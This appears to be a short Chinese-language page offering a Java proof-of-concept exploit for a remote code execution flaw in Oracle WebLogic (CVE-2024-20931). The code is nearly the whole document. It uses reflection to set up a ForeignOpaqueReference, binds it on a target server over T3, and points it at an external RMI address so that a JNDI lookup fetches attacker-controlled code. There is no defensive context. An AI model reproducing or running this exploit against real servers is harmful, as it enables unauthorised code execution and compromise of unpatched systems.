1.9 KiB
1.9 KiB
Weblogic远程代码执行(CVE-2024-20931)
poc
package com.supeream;
import weblogic.deployment.jms.ForeignOpaqueReference;
import javax.naming.Context;
import javax.naming.InitialContext;
import java.lang.reflect.Field;
import java.util.Hashtable;
public class CVE_2024_209321 {
public static void main(String[] args) throws Exception {
String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
// 创建用来远程绑定对象的InitialContext
String url = "t3://127.0.0.1:7001"; // 目标机器
Hashtable env1 = new Hashtable();
env1.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
env1.put(Context.PROVIDER_URL, url); // 目标
InitialContext c = new InitialContext(env1);
// ForeignOpaqueReference的jndiEnvironment属性
Hashtable env2 = new Hashtable();
env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
env2.put("datasource", "rmi://127.0.0.1:1099/ygevmj");
// ForeignOpaqueReference的jndiEnvironment和remoteJNDIName属性
ForeignOpaqueReference f = new ForeignOpaqueReference();
Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
jndiEnvironment.setAccessible(true);
jndiEnvironment.set(f, env2);
Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
remoteJNDIName.setAccessible(true);
String ldap = "rmi://127.0.0.1:1099/ygevmj";
remoteJNDIName.set(f, ldap);
// 远程绑定ForeignOpaqueReference对象
c.rebind("glassy", f);
// lookup查询ForeignOpaqueReference对象
try {
c.lookup("glassy");
} catch (Exception e) {
}
}
}